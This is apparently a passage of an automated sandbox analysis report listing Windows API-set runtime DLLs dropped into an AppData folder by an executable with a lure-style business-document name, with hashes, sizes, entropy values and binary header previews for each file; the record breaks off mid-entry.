SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
SSDEEP:	1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
MD5:	9910A1BFDC41C5B39F6AF37F0A22AACD
SHA1:	47FA76778556F34A5E7910C816C78835109E4050
SHA-256:	65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
SHA-512:	A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.076072254895036
Encrypted:	false
SSDEEP:	192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
MD5:	8D02DD4C29BD490E672D271700511371
SHA1:	F3035A756E2E963764912C6B432E74615AE07011
SHA-256:	C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:	D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22840
Entropy (8bit):	6.942029615075195
Encrypted:	false
SSDEEP:	384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:	41A348F9BEDC8681FB30FA78E45EDB24
SHA1:	66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:	C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:	8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24368
